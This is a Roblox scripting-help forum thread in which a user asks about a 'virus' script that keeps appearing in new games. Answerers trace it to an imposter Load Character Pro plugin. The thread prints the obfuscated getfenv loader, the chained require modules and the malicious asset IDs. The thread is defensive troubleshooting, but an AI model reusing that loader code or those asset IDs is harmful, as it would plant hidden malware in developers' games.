Scripting Helpers is winding down operations and is now read-only. More info→
Ad
Log in to vote
0

Virus Script randomly popping up?

Asked by 3 years ago

A random script always pops up whenever I create a new game in either the Camera, Terrain or Baseplate. The name of this script is either "Welding", "Fix" or has no name at all. The only plugin that is currently on is Load Character Pro -by Team Avol and Tool Grip Editor -by CloneTrooper1019. Please help!!

Virus Script:

getfenv()['\114\101\113\117\105\114\101'](6.58860418047*733837367)

This virus script has 410 lines and line 290, which i believe is the virus line. The rest of the lines are blank except for line 2, 3 and 4 which says:


--This an script of ROBLOX Studio. Do not delete it, this script secures your game from exploiters. --Thanks.
0
Check in your plugins folder to make sure thats the only plugins you have installed. AC_Starmarine -2 — 3y
0
I do have others but I am sure they aren't viruses. Collision Group Editor -by CloneTrooper1019 and Pizza Place Video Maker - by Dued1 kanyeweasftd 14 — 3y
0
yeah looks like a virus. if you printout that getfenv request it prints out require (4834963944.0013) sounds like something you've downloaded in a form of a plugin is trying to inject a script/plugin into your studio TGazza 1336 — 3y

2 answers

Log in to vote
0
Answered by 3 years ago
Edited 3 years ago

Have you gotten any Clone Plugins (Imposter Plugins) because they are very Common around the plugins tab, They're basically bots that re-upload plugins but with a Secret Script, maybe disable all plugins currently Installed to see which plugin is the wrong one

The script will insert This:

https://www.roblox.com/library/4834963944/unnamed

The Modulescript will have this Injected into it, which is another require

local module = {}
pcall(function()require(4952780794)end)
return module

This is what it brings up:

https://www.roblox.com/library/4952780794/yep-god

This module will contain another require -.-

local module = {}
pcall(function()require(5633904862)end)
return module

This is gonna be an inf chain at this point, so ill link all the scripts it will require

https://www.roblox.com/library/5633904862/Fly-2 \/ https://www.roblox.com/library/5622218592/Fly

This script above WILL Crash you game,

If you Have the BTroblox Plugin for chrome https://chrome.google.com/webstore/detail/btroblox-making-roblox-be/hbkpclpemjeibhioopcebchdmohaieln Then you can view the script on the website

Just Uninstall All plugins, and start again C:

EDIT:

YOU HAVE THE WRONG LOAD CHARACTER PLUGIN!!!!!

https://www.roblox.com/library/4489766693/Load-Character-Pro

THE REAL ONE IS BY AlreadyPro

25 robux wasted on a clone

i would suggest getting the lite version if you havent have any robux https://www.roblox.com/library/752585459/Load-Character-Lite

but the PRO one is more secure

0
Omg I can't believe I am this blind to not realise that XD. Thanks for the help! I uninstalled it and downloaded the real one (AlreadyPro) lite verison because i am broke :(. kanyeweasftd 14 — 3y
Ad
Log in to vote
0
Answered by 3 years ago

The virus is the character loader. I have seen this before many times in that plugin so it is best to uninstall it. Just in case you want it, I recommend you use AlreadyPro's character loader because there is no virus

Answer this question